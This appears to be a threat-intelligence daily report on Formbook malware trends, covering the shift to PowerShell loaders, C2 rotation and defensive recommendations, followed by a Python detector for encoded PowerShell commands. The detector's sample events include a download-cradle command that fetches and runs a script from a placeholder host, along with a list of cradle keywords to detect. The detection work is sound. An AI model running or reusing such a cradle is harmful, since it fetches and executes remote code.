Daily Summary
Formbook activity remained stable on 2026-05-02 with 38 new samples, a 15% increase over the 7-day average of 33. While the count is elevated, it falls within a normal fluctuation range and does not indicate a surge. The sample distribution shows a clear pivot to PowerShell-based delivery.
New Samples Detected
PowerShell scripts (.ps1) dominate today with 26 of 38 samples, representing 68% of all submissions. JavaScript (.js) follows with 5 samples, while executable files (.exe and .dll) collectively account for only 4. Traditional batch (.bat, .cmd) and VBScript (.vbe) files make up the small remainder. This marks a continued shift away from compiled binaries toward script-based loaders, most likely intended to bypass application whitelisting and static analysis.
Distribution Methods
The heavy reliance on .ps1 files suggests Formbook is being delivered via phishing emails containing PowerShell download cradles or macro-enabled documents that invoke PowerShell. The .js files may originate from drive-by download campaigns or email attachments. The low .exe and .dll count indicates threat actors are avoiding PE files to evade endpoint detection and response (EDR) heuristics.
Detection Rate
Based on the prevalence of obfuscated PowerShell and JavaScript, many AV engines are likely generating mixed detection results. Script-based variants, especially those using reflection or .NET loading, can bypass signature-based engines. SOC teams should rely on behavioral detection and AMSI logging rather than signature matching for current samples.
C2 Infrastructure
Analysts identified 55 new C2 servers and 93 new IOCs today. This volume is consistent with Formbook’s pattern of rotating infrastructure frequently to avoid domain blocklists. No geographic clustering is evident in the data, but the high turnover suggests automated C2 provisioning.
7-Day Trend
Activity over the past week has been steady with slight daily variation. Today’s 38 samples are within the normal range for the family, and there is no evidence of an upward or downward trend.
Security Analysis
The dominance of .ps1 files (68%) over all other types represents a deliberate tactical shift. Historically, Formbook relied more heavily on packed .exe and macro-enabled Office files. The move to PowerShell aligns with broader adversary trends to leverage living-off-the-land binaries (LOLBins) for initial access and payload delivery. Defenders should focus on restricting PowerShell execution policy, enabling script block logging, and monitoring for base64-encoded commands in process creation events.
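As an added example that is not part of this summary, the Python below triages constructed process-creation events for the base64-encoded PowerShell pattern recommended for monitoring above: it recognises the abbreviated -EncodedCommand switches powershell.exe accepts, decodes the UTF-16LE payload, and flags the download-cradle and .NET-loading markers the report mentions. The event fields, marker list and sample command lines are assumptions, not data from the report.

```python
import base64
import binascii
import re
# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus the
# alias -ec, so matching the literal "-EncodedCommand" misses most real command lines.
def is_encoded_flag(token: str) -> bool:
    if not token or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or (name.startswith("e") and "encodedcommand".startswith(name))

# Behaviours the summary calls out: download cradles, reflection/.NET loading, nested base64.
CRADLE_MARKERS = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|net\.webclient|"
    r"invoke-webrequest|invoke-restmethod|frombase64string|reflection\.assembly)\b"
)
def decode_encoded_command(cmdline: str):
    """Return the decoded script when the command line carries an encoded command, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            blob = tokens[i + 1].strip("\"'")
            try:
                # -EncodedCommand is base64 over UTF-16LE text, not UTF-8
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None  # malformed payload; powershell.exe would reject it as well
    return None
def triage_process_event(event: dict) -> dict:
    """Classify one process-creation event (image + command line) for encoded PowerShell."""
    result = {"encoded": False, "decoded": None, "markers": []}
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return result
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        result.update(encoded=True, decoded=script,
                      markers=sorted({m.lower() for m in CRADLE_MARKERS.findall(script)}))
    return result

# Constructed sample events shaped like process-creation telemetry (not real data).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "cmdline": "powershell.exe -nop -w hidden -enc "
     + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    # -ExecutionPolicy Bypass is a per-invocation override, so the policy alone is no barrier
    {"image": PS, "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inv.ps1"},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]
```

Feeding real 4688 or Sysmon EventID 1 command lines into triage_process_event gives the decoded script for script block correlation, while events with -ExecutionPolicy overrides still surface only through the logging itself.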